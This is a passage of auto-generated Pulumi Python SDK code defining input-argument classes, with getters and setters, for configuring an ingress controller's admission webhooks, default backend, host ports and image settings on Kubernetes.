@create_secret_job.setter
def create_secret_job(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksCreateSecretJobArgs']]):
pulumi.set(self, "create_secret_job", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="existingPsp")
def existing_psp(self) -> Optional[pulumi.Input[str]]:
"""
Use an existing PSP instead of creating one.
"""
return pulumi.get(self, "existing_psp")
@existing_psp.setter
def existing_psp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "existing_psp", value)
@property
@pulumi.getter(name="failurePolicy")
def failure_policy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "failure_policy")
@failure_policy.setter
def failure_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "failure_policy", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="namespaceSelector")
def namespace_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "namespace_selector")
@namespace_selector.setter
def namespace_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "namespace_selector", value)
@property
@pulumi.getter(name="objectSelector")
def object_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "object_selector")
@object_selector.setter
def object_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "object_selector", value)
@property
@pulumi.getter
def patch(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksPatchArgs']]:
return pulumi.get(self, "patch")
@patch.setter
def patch(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchArgs']]):
pulumi.set(self, "patch", value)
@property
@pulumi.getter(name="patchWebhookJob")
def patch_webhook_job(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksPatchWebhbookJobArgs']]:
return pulumi.get(self, "patch_webhook_job")
@patch_webhook_job.setter
def patch_webhook_job(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchWebhbookJobArgs']]):
pulumi.set(self, "patch_webhook_job", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksServiceArgs']]:
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksServiceArgs']]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="timeoutSeconds")
def timeout_seconds(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "timeout_seconds")
@timeout_seconds.setter
def timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_seconds", value)
@pulumi.input_type
class ControllerAdmissionWebhooksCreateSecretJobArgs:
def __init__(__self__, *,
resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None):
if resources is not None:
pulumi.set(__self__, "resources", resources)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
pulumi.set(self, "resources", value)
@pulumi.input_type
class ControllerAdmissionWebhooksPatchWebhbookJobArgs:
def __init__(__self__, *,
resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None):
if resources is not None:
pulumi.set(__self__, "resources", resources)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
pulumi.set(self, "resources", value)
@pulumi.input_type
class ControllerAdmissionWebhooksPatchArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
image: Optional[pulumi.Input['ControllerImageArgs']] = None,
node_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pod_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
priority_class_name: Optional[pulumi.Input[str]] = None,
run_as_user: Optional[pulumi.Input[int]] = None,
tolerations: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]] = None):
"""
:param pulumi.Input[str] priority_class_name: Provide a priority class name to the webhook patching job.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if image is not None:
pulumi.set(__self__, "image", image)
if node_selector is not None:
pulumi.set(__self__, "node_selector", node_selector)
if pod_annotations is not None:
pulumi.set(__self__, "pod_annotations", pod_annotations)
if priority_class_name is not None:
pulumi.set(__self__, "priority_class_name", priority_class_name)
if run_as_user is not None:
pulumi.set(__self__, "run_as_user", run_as_user)
if tolerations is not None:
pulumi.set(__self__, "tolerations", tolerations)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def image(self) -> Optional[pulumi.Input['ControllerImageArgs']]:
return pulumi.get(self, "image")
@image.setter
def image(self, value: Optional[pulumi.Input['ControllerImageArgs']]):
pulumi.set(self, "image", value)
@property
@pulumi.getter(name="nodeSelector")
def node_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "node_selector")
@node_selector.setter
def node_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "node_selector", value)
@property
@pulumi.getter(name="podAnnotations")
def pod_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "pod_annotations")
@pod_annotations.setter
def pod_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "pod_annotations", value)
@property
@pulumi.getter(name="priorityClassName")
def priority_class_name(self) -> Optional[pulumi.Input[str]]:
"""
Provide a priority class name to the webhook patching job.
"""
return pulumi.get(self, "priority_class_name")
@priority_class_name.setter
def priority_class_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "priority_class_name", value)
@property
@pulumi.getter(name="runAsUser")
def run_as_user(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "run_as_user")
@run_as_user.setter
def run_as_user(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "run_as_user", value)
@property
@pulumi.getter
def tolerations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]:
return pulumi.get(self, "tolerations")
@tolerations.setter
def tolerations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]):
pulumi.set(self, "tolerations", value)
@pulumi.input_type
class ControllerAdmissionWebhooksServiceArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
cluster_ip: Optional[pulumi.Input[str]] = None,
external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_ips: Optional[pulumi.Input[str]] = None,
load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_port: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if cluster_ip is not None:
pulumi.set(__self__, "cluster_ip", cluster_ip)
if external_ips is not None:
pulumi.set(__self__, "external_ips", external_ips)
if load_balancer_ips is not None:
pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
if load_balancer_source_ranges is not None:
pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
if service_port is not None:
pulumi.set(__self__, "service_port", service_port)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clusterIP")
def cluster_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cluster_ip")
@cluster_ip.setter
def cluster_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_ip", value)
@property
@pulumi.getter(name="externalIPs")
def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "external_ips")
@external_ips.setter
def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_ips", value)
@property
@pulumi.getter(name="loadBalancerIPs")
def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "load_balancer_ips")
@load_balancer_ips.setter
def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancer_ips", value)
@property
@pulumi.getter(name="loadBalancerSourceRanges")
def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "load_balancer_source_ranges")
@load_balancer_source_ranges.setter
def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "load_balancer_source_ranges", value)
@property
@pulumi.getter(name="servicePort")
def service_port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "service_port")
@service_port.setter
def service_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "service_port", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerCustomTemplateArgs:
def __init__(__self__, *,
config_map_key: Optional[pulumi.Input[str]] = None,
config_map_name: Optional[pulumi.Input[str]] = None):
if config_map_key is not None:
pulumi.set(__self__, "config_map_key", config_map_key)
if config_map_name is not None:
pulumi.set(__self__, "config_map_name", config_map_name)
@property
@pulumi.getter(name="configMapKey")
def config_map_key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config_map_key")
@config_map_key.setter
def config_map_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_map_key", value)
@property
@pulumi.getter(name="configMapName")
def config_map_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config_map_name")
@config_map_name.setter
def config_map_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_map_name", value)
@pulumi.input_type
class ControllerDefaultBackendServiceArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
cluster_ip: Optional[pulumi.Input[str]] = None,
external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_ip: Optional[pulumi.Input[str]] = None,
load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_port: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_ips: List of IP addresses at which the default backend service is available. Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if cluster_ip is not None:
pulumi.set(__self__, "cluster_ip", cluster_ip)
if external_ips is not None:
pulumi.set(__self__, "external_ips", external_ips)
if load_balancer_ip is not None:
pulumi.set(__self__, "load_balancer_ip", load_balancer_ip)
if load_balancer_source_ranges is not None:
pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
if service_port is not None:
pulumi.set(__self__, "service_port", service_port)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clusterIP")
def cluster_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cluster_ip")
@cluster_ip.setter
def cluster_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_ip", value)
@property
@pulumi.getter(name="externalIPs")
def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of IP addresses at which the default backend service is available. Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
"""
return pulumi.get(self, "external_ips")
@external_ips.setter
def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_ips", value)
@property
@pulumi.getter(name="loadBalancerIP")
def load_balancer_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "load_balancer_ip")
@load_balancer_ip.setter
def load_balancer_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancer_ip", value)
@property
@pulumi.getter(name="loadBalancerSourceRanges")
def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "load_balancer_source_ranges")
@load_balancer_source_ranges.setter
def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "load_balancer_source_ranges", value)
@property
@pulumi.getter(name="servicePort")
def service_port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "service_port")
@service_port.setter
def service_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "service_port", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerDefaultBackendArgs:
def __init__(__self__, *,
affinity: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']] = None,
autoscaling: Optional[pulumi.Input['AutoscalingArgs']] = None,
enabled: Optional[pulumi.Input[bool]] = None,
existing_psp: Optional[pulumi.Input[str]] = None,
extra_args: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
extra_envs: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]] = None,
extra_volume_mounts: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]] = None,
extra_volumes: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]] = None,
image: Optional[pulumi.Input['ControllerImageArgs']] = None,
liveness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
min_available: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
node_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pod_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pod_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pod_security_context: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']] = None,
port: Optional[pulumi.Input[int]] = None,
priority_class_name: Optional[pulumi.Input[str]] = None,
readiness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
replica_count: Optional[pulumi.Input[int]] = None,
resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None,
service: Optional[pulumi.Input['ControllerDefaultBackendServiceArgs']] = None,
service_account: Optional[pulumi.Input['ControllerServiceAccountArgs']] = None,
tolerations: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]] = None):
"""
:param pulumi.Input[str] existing_psp: Use an existing PSP instead of creating one.
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]] extra_volume_mounts: Additional volumeMounts to the default backend container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]] extra_volumes: Additional volumes to the default backend pod. - name: copy-portal-skins emptyDir: {}
:param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] liveness_probe: Liveness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] node_selector: Node labels for default backend pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_annotations: Annotations to be added to default backend pods.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_labels: labels to add to the pod container metadata
:param pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs'] pod_security_context: Security Context policies for controller pods. See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
:param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] readiness_probe: Readiness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]] tolerations: Node tolerations for server scheduling to nodes with taints. Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
"""
if affinity is not None:
pulumi.set(__self__, "affinity", affinity)
if autoscaling is not None:
pulumi.set(__self__, "autoscaling", autoscaling)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if existing_psp is not None:
pulumi.set(__self__, "existing_psp", existing_psp)
if extra_args is not None:
pulumi.set(__self__, "extra_args", extra_args)
if extra_envs is not None:
pulumi.set(__self__, "extra_envs", extra_envs)
if extra_volume_mounts is not None:
pulumi.set(__self__, "extra_volume_mounts", extra_volume_mounts)
if extra_volumes is not None:
pulumi.set(__self__, "extra_volumes", extra_volumes)
if image is not None:
pulumi.set(__self__, "image", image)
if liveness_probe is not None:
pulumi.set(__self__, "liveness_probe", liveness_probe)
if min_available is not None:
pulumi.set(__self__, "min_available", min_available)
if name is not None:
pulumi.set(__self__, "name", name)
if node_selector is not None:
pulumi.set(__self__, "node_selector", node_selector)
if pod_annotations is not None:
pulumi.set(__self__, "pod_annotations", pod_annotations)
if pod_labels is not None:
pulumi.set(__self__, "pod_labels", pod_labels)
if pod_security_context is not None:
pulumi.set(__self__, "pod_security_context", pod_security_context)
if port is not None:
pulumi.set(__self__, "port", port)
if priority_class_name is not None:
pulumi.set(__self__, "priority_class_name", priority_class_name)
if readiness_probe is not None:
pulumi.set(__self__, "readiness_probe", readiness_probe)
if replica_count is not None:
pulumi.set(__self__, "replica_count", replica_count)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if service is not None:
pulumi.set(__self__, "service", service)
if service_account is not None:
pulumi.set(__self__, "service_account", service_account)
if tolerations is not None:
pulumi.set(__self__, "tolerations", tolerations)
@property
@pulumi.getter
def affinity(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]:
return pulumi.get(self, "affinity")
@affinity.setter
def affinity(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]):
pulumi.set(self, "affinity", value)
@property
@pulumi.getter
def autoscaling(self) -> Optional[pulumi.Input['AutoscalingArgs']]:
return pulumi.get(self, "autoscaling")
@autoscaling.setter
def autoscaling(self, value: Optional[pulumi.Input['AutoscalingArgs']]):
pulumi.set(self, "autoscaling", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="existingPsp")
def existing_psp(self) -> Optional[pulumi.Input[str]]:
"""
Use an existing PSP instead of creating one.
"""
return pulumi.get(self, "existing_psp")
@existing_psp.setter
def existing_psp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "existing_psp", value)
@property
@pulumi.getter(name="extraArgs")
def extra_args(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "extra_args")
@extra_args.setter
def extra_args(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "extra_args", value)
@property
@pulumi.getter(name="extraEnvs")
def extra_envs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]:
return pulumi.get(self, "extra_envs")
@extra_envs.setter
def extra_envs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]):
pulumi.set(self, "extra_envs", value)
@property
@pulumi.getter(name="extraVolumeMounts")
def extra_volume_mounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]:
"""
Additional volumeMounts to the default backend container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
"""
return pulumi.get(self, "extra_volume_mounts")
@extra_volume_mounts.setter
def extra_volume_mounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]):
pulumi.set(self, "extra_volume_mounts", value)
@property
@pulumi.getter(name="extraVolumes")
def extra_volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]:
"""
Additional volumes to the default backend pod. - name: copy-portal-skins emptyDir: {}
"""
return pulumi.get(self, "extra_volumes")
@extra_volumes.setter
def extra_volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]):
pulumi.set(self, "extra_volumes", value)
@property
@pulumi.getter
def image(self) -> Optional[pulumi.Input['ControllerImageArgs']]:
return pulumi.get(self, "image")
@image.setter
def image(self, value: Optional[pulumi.Input['ControllerImageArgs']]):
pulumi.set(self, "image", value)
@property
@pulumi.getter(name="livenessProbe")
def liveness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
"""
Liveness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
"""
return pulumi.get(self, "liveness_probe")
@liveness_probe.setter
def liveness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
pulumi.set(self, "liveness_probe", value)
@property
@pulumi.getter(name="minAvailable")
def min_available(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_available")
@min_available.setter
def min_available(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_available", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nodeSelector")
def node_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Node labels for default backend pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
"""
return pulumi.get(self, "node_selector")
@node_selector.setter
def node_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "node_selector", value)
@property
@pulumi.getter(name="podAnnotations")
def pod_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations to be added to default backend pods.
"""
return pulumi.get(self, "pod_annotations")
@pod_annotations.setter
def pod_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "pod_annotations", value)
@property
@pulumi.getter(name="podLabels")
def pod_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
labels to add to the pod container metadata
"""
return pulumi.get(self, "pod_labels")
@pod_labels.setter
def pod_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "pod_labels", value)
@property
@pulumi.getter(name="podSecurityContext")
def pod_security_context(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]:
"""
Security Context policies for controller pods. See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
"""
return pulumi.get(self, "pod_security_context")
@pod_security_context.setter
def pod_security_context(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]):
pulumi.set(self, "pod_security_context", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="priorityClassName")
def priority_class_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "priority_class_name")
@priority_class_name.setter
def priority_class_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "priority_class_name", value)
@property
@pulumi.getter(name="readinessProbe")
def readiness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
"""
Readiness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
"""
return pulumi.get(self, "readiness_probe")
@readiness_probe.setter
def readiness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
pulumi.set(self, "readiness_probe", value)
@property
@pulumi.getter(name="replicaCount")
def replica_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "replica_count")
@replica_count.setter
def replica_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "replica_count", value)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
pulumi.set(self, "resources", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input['ControllerDefaultBackendServiceArgs']]:
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input['ControllerDefaultBackendServiceArgs']]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="serviceAccount")
def service_account(self) -> Optional[pulumi.Input['ControllerServiceAccountArgs']]:
return pulumi.get(self, "service_account")
@service_account.setter
def service_account(self, value: Optional[pulumi.Input['ControllerServiceAccountArgs']]):
pulumi.set(self, "service_account", value)
@property
@pulumi.getter
def tolerations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]:
"""
Node tolerations for server scheduling to nodes with taints. Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
"""
return pulumi.get(self, "tolerations")
@tolerations.setter
def tolerations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]):
pulumi.set(self, "tolerations", value)
@pulumi.input_type
class ControllerHostPortPortsArgs:
def __init__(__self__, *,
http: Optional[pulumi.Input[int]] = None,
https: Optional[pulumi.Input[int]] = None):
if http is not None:
pulumi.set(__self__, "http", http)
if https is not None:
pulumi.set(__self__, "https", https)
@property
@pulumi.getter
def http(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "http")
@http.setter
def http(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http", value)
@property
@pulumi.getter
def https(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "https")
@https.setter
def https(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "https", value)
@pulumi.input_type
class ControllerHostPortArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
ports: Optional[pulumi.Input['ControllerHostPortPortsArgs']] = None):
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if ports is not None:
pulumi.set(__self__, "ports", ports)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input['ControllerHostPortPortsArgs']]:
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input['ControllerHostPortPortsArgs']]):
pulumi.set(self, "ports", value)
@pulumi.input_type
class ControllerImageArgs:
def __init__(__self__, *,
allow_privilege_escalation: Optional[pulumi.Input[bool]] = None,
digest: Optional[pulumi.Input[str]] = None,
image: Optional[pulumi.Input[str]] = None,
pull_policy: Optional[pulumi.Input[str]] = None,
read_only_root_filesystem: Optional[pulumi.Input[bool]] = None,
registry: Optional[pulumi.Input[str]] = None,
